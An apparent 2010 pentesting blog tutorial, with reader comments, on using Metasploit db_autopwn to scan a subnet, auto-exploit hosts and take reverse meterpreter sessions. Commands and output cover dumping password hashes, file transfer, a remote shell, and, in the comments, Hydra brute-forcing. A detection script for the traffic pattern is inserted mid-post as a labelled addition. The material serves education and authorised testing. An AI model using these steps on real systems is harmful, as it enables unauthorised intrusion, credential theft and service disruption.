Tuesday, 17 August 2010

Mass Pwnage: Hacking with Metasploit db_autopwn and reverse meterpreter payloads

Metasploit is a powerful exploitation framework and can be used to scan and attack multiple systems in an automated way. Here we look at some basic examples of using the Metasploit db_autopwn feature.

These techniques can be used to scan networks and identify real, exploitable vulnerabilities en masse. Patch management and proper configuration are usually the cures for most of these vulnerabilities, but knowing where the exploitable vulnerabilities are in a network is the first step in focusing your efforts on the areas that need it most.

Also, knowing the power that an attacker can wield with such tools can help raise the priority of IT Security in risk assessment, especially when reporting to management, so that the correct resources can be applied to reduce risks.

Please be good and do not abuse these techniques to attack systems where you don't have express permission. These techniques can easily cause denial of service, and should only be used for pentesting and educational purposes.

We will be using Backtrack 4 R1 in these examples, as Metasploit and MySQL are already installed and preconfigured.



Setup
We are going to log our information to a database, so let's start MySQL first:

/etc/init.d/mysql start
netstat -antp |grep 3306

tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      5852/mysqld

MySQL is running and listening, so now let's start Metasploit:
cd /pentest/exploits/framework3/
./msfconsole

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 575 exploits - 290 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9959 updated 8 days ago (2010.08.05)

Warning: This copy of the Metasploit Framework was last updated 8 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf>

First we select a database driver; in this case we are using MySQL:

db_driver mysql

Basic db_autopwn pwnage
In the first example we will create a new database called mytest1 using our MySQL credentials, connect to it, and scan a single machine using nmap. Then we will run all the exploits that match the open ports that are found:

db_connect root:toor@mytest1
db_nmap 192.168.1.2
db_autopwn -p -t -e -r


The db_autopwn options in this example match exploits to open ports (-p), show the exploits to be run (-t), run the exploits (-e), and connect back using a reverse meterpreter payload (-r).

This may take several minutes to run, depending on the number and types of open ports. HTTP ports can take a long time because of the large number of exploits Metasploit includes for the well-known HTTP ports. Let the exploitation complete (it may take 10+ minutes, depending on your connectivity to the victim system).

If any exploits are successful, a list of active sessions to the victim machine will be shown. We have a reverse meterpreter session and we can interact with it as follows:

sessions -l

Active sessions
===============

  Id  Type         Information                    Connection
  --  ----         -----------                    ----------
  1   meterpreter  TEST-DESKTOP\Ben @ TEST-DESKTOP  192.168.1.64:4444 -> 192.168.1.65:1386

sessions -i 1
[*] Starting interaction with 1...

meterpreter >


Once we connect to the session, further attacks and analysis can proceed as follows:

1) Obtaining the password hashes:

use priv
Loading extension priv...success.

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ca760e0d17329dc138d1f5b561ec6e7a:af03c8eecf80cd854ea88b0292b926c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:d0ddee59ea760a946232d2192bbe3c71:::


2) Uploading and downloading files:

upload /var/www/plink.exe c:\\
[*] uploading  : /var/www/plink.exe -> c:\
[*] uploaded   : /var/www/plink.exe -> c:\\plink.exe


download c:\\windows\\system32\\drivers\\etc\\hosts /root/hosts
[*] downloading: c:\windows\system32\drivers\etc\hosts -> /root/hosts
[*] downloaded : c:\windows\system32\drivers\etc\hosts -> /root/hosts


3) Gaining a shell:

shell
Process 2640 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>
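
Seen from the target network, the sequence above is a burst of connections from one source to many ports on a host, followed by that host opening a connection back to the same source (the reverse meterpreter session on port 4444 in the listing). A detection sketch for that pattern, added here as an example and not part of the original post; the log format, sample lines, time window and port threshold are constructed assumptions:

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)   # assumed correlation window
MIN_PORTS = 4                    # assumed threshold of distinct ports probed

# Constructed sample: new-TCP-connection records, "time src:sport -> dst:dport".
SAMPLE_LOG = """\
2010-08-17T13:20:01 192.168.1.64:40001 -> 192.168.1.65:21
2010-08-17T13:20:01 192.168.1.64:40002 -> 192.168.1.65:80
2010-08-17T13:20:02 192.168.1.64:40003 -> 192.168.1.65:135
2010-08-17T13:20:02 192.168.1.64:40004 -> 192.168.1.65:139
2010-08-17T13:20:03 192.168.1.64:40005 -> 192.168.1.65:445
2010-08-17T13:21:10 192.168.1.70:51000 -> 192.168.1.65:445
2010-08-17T13:24:40 192.168.1.65:1386 -> 192.168.1.64:4444
2010-08-17T13:25:00 192.168.1.65:1390 -> 192.168.1.70:80
"""

def parse(line):
    """Split one constructed log record into typed fields."""
    ts, src, _, dst = line.split()
    s_ip, s_port = src.rsplit(":", 1)
    d_ip, d_port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), s_ip, int(s_port), d_ip, int(d_port)

def find_callbacks(log_text, window=WINDOW, min_ports=MIN_PORTS):
    """Return (victim, scanner, port, ports_probed) for each connection a host
    opens back to a peer that recently probed >= min_ports of its ports."""
    probes = defaultdict(list)          # (scanner, target) -> [(time, dport)]
    alerts = []
    for line in filter(None, map(str.strip, log_text.splitlines())):
        ts, src, _sport, dst, dport = parse(line)
        # Ports that dst touched on src inside the window before this record.
        recent = {p for t, p in probes[(dst, src)] if ts - t <= window}
        if len(recent) >= min_ports:
            alerts.append((src, dst, dport, sorted(recent)))
        else:
            probes[(src, dst)].append((ts, dport))
    return alerts

if __name__ == "__main__":
    for victim, scanner, port, probed in find_callbacks(SAMPLE_LOG):
        print(f"{victim} connected back to {scanner}:{port} after probes on {probed}")
```

The single connection from 192.168.1.70 to port 445 stays below the threshold, so the later connection to that host is not flagged; tune the window and threshold to the normal traffic of the network being monitored.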



IP address range exploitation
Attacking multiple machines is where the power of db_autopwn really comes into effect.

Let's scan, and attempt to exploit, a whole subnet in a new database:

db_driver mysql
db_connect root:toor@mysubnet1
db_nmap 192.168.1.0/24


Now let's look at the systems we have data on:

db_hosts

Hosts
=====

address        address6  arch  comm  comments  created_at                    info  mac                name            os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at                    svcs  vulns  workspace
-------        --------  ----  ----  --------  ----------                    ----  ---                ----            ---------  -------  -------  -----  -------  -----  ----------                    ----  -----  ---------
192.168.1.254                                  Tue Aug 17 12:51:56 UTC 2010        00:0E:50:EC:B2:A6  speedtouch.lan                                               alive  Tue Aug 17 12:51:56 UTC 2010  5     0      default
192.168.1.65                                   Tue Aug 17 13:22:14 UTC 2010        00:22:3F:E9:89:FF  test_system.lan                                                alive  Tue Aug 17 13:22:14 UTC 2010  4     0      default

Again, an exploitation of the scanned machines could be run as follows:

db_autopwn -p -t -e -r

However, depending on the number of machines found, running this exploitation may take considerable time.

Additionally, in a live pentest, exploiting many systems at once can cause denial of service headaches on multiple systems. This can be mitigated by focusing the exploitation on particular ports, or particular ranges of machines, and working through the network gradually, logging vulnerabilities in our database as we go.

The exploitation can be focused by IP address range:

db_autopwn -p -t -e -r -I 192.168.1.10

...or by port:

db_autopwn -p -t -e -r -PI 445

...or both:

db_autopwn -p -t -e -r -PI 445 -I 192.168.1.10

For large numbers of vulnerable machines, this makes the exploitation and analysis more manageable, especially on production networks where live services may be affected and need to be restarted.

What have we found?
We exploited multiple vulnerabilities in several systems, gained access, and "did stuff", but which vulnerabilities did we exploit on these systems?

You can interrogate the list of successful exploitations by running the following command in Metasploit:

db_vulns

Alternatively, we can go and have a poke around in the MySQL database directly, with the following sequence of commands:

mysql -u root -ptoor

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.0.67-0ubuntu6 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| mysubnet1          |
+--------------------+
7 rows in set (0.36 sec)

mysql> use mysubnet1;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------------+
| Tables_in_mysubnet1 |
+---------------------+
| clients             |
| events              |
| hosts               |
| loots               |
| notes               |
| refs                |
| reports             |
| schema_migrations   |
| services            |
| tasks               |
| users               |
| vulns               |
| vulns_refs          |
| wmap_requests       |
| wmap_targets        |
| workspaces          |
+---------------------+
16 rows in set (0.00 sec)

mysql> select * from vulns;


We have completed our basic pentest on our subnet, and identified some vulnerable hosts. We know exactly which ones, and what needs to be fixed.

Take a bow for a round of applause, time for a teabreak ...and that was a basic guide on db_autopwn

These threats are best mitigated using an IT Security program which includes:
  • Multiple layers (defense in depth)
  • Secure application development/deployment
  • Applying recommended safe configurations
  • Patch management and software upgrades
  • Vulnerability scanning and remediation

9 comments:

  1. Hi, thanks for your post. I am just starting to learn about hacking and I have 1 quick question please:
    - Metasploit db_autopwn is used to penetrate networks (as opposed to live websites)... is that correct? I tried to penetrate several of my own websites with the most recent version of backtrack 4r2 and it has never opened a single session so far...
    Rgds.

  2. Don't break the law (check my post from Jan 26, 2011)
    Do some research (Google: "Metasploit Unleashed")

  3. Hi, I know I am not obliged to respond but maybe I used words that made you misunderstand my true intentions. Actually I own 3 websites and hackers defaced 1 of my sites. So I was wondering if they could have used this specific function db_autopwn even if my site is hosted on a big 3rd party hosting company like hostmonsters - not on my personal servers. (For example I don't control Apache version update on them!)
    Sorry for the confusion, don’t feel obliged to respond, I just wanted to clear that up.
    (I should have used the term penetration testing instead of hacking I guess.)

  4. Sure, it's not a problem. Sorry my initial response was a bit brief. I wasn't trying to be rude.

    If you look at my post on the "legal implications" back at the end of January, you will see that individuals can't legally "pentest" their own websites if they are hosted with a third-party (unless you have permission, which would be very difficult to get if you are acting as an individual)

    To be honest, db_autopwn would be pretty useless for attacking internet-facing systems, as bot-nets already do that en-masse 24/7.

    Anything internet-facing that is pwnable in an automated way, is typically already pwned by botnets.

    db_autopwn is more useful for internal penetration testing in companies (or for experimentation and fun at home ;o)

    It is an interesting tool for experimentation, and demonstration, but probably too generic and unfocused to be used by real attackers.

  5. Depending on your site, it may have been a web-vulnerability in the code you were using.

    (more likely than an Apache or FTP vulnerability which db_autopwn might find for example)

    Again, Metasploit is not really a tool for web application attack testing. Maybe I will do a blog on various web application attack tools at some point.

    (there are 1000's of different tools for different purposes)

  6. Hi Ben,

    I appreciate your clear response. I didn’t know I couldn’t pentest my own website so thank you for enlightening me on that (feels great to be anonymous!) My goal with db_autopwn was to try to ‘reverse-engineer’ the hack… it couldn’t open any session so I wanted to make sure I was using the proper tool. Maybe the hacker bruteforced our ftp port but it really doesn’t seem efficient to me.

    In the future maybe I can mirror the sites with httrack and pentest them on my drive… that complicates things and doesn’t seem appropriate to test server-side security though… But since the sites are third-party hosted and I have no real control on servers I should maybe just let it go.

    I would like to read your blog on web applications attack tools for sure.

    Rgds.

    (So I’ve installed backtrack and learned a few functions for no reason since I don’t have access to company networks nor want to breach them. Would still be fun to test though… I might install windows server on my cpu with virtualbox!)

  7. Hydra is one of the best brute-force tools (available in Backtrack 4) Also in that distribution are millions of passwords in several databases.

    This makes brute-forcing FTP passwords trivial (and many other protocols) as long as the password is one that appears in one of the dictionaries.

    This could be the root of your problem, but there could be many reasons. Do you have the website and ftp logs?

    (if it were me, I would start there)

  8. OK... so just to make things clear... the db_autopwn option can be used just on servers and databases? Can it be used to check the vulnerabilities on a normal, standalone computer with let's say... windows xp installed? It should be possible... because the exploit database is the same, right? Thanks a mill!!

  9. Anonymous - Yes, Metasploit can be used anywhere where the vulnerabilities it contains are present. This could include servers, workstations, laptops, smart-phones and appliances.
